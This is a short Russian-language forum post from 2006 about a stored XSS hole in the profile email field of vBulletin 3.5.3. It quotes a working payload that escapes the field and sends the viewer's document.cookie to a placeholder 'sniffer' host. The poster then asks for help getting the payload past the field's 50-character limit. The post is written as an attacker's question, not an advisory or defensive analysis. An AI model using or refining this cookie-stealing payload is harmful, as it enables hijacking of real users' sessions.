08.09.2006, 16:42
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
vBulletin 3.5.3. Вопрос по XSS в поле email
В этой версии форума в поле mail в профиле, можно провести xss
mail@mail.com”><script>img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;</script>.nomatt
Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +) |
|
|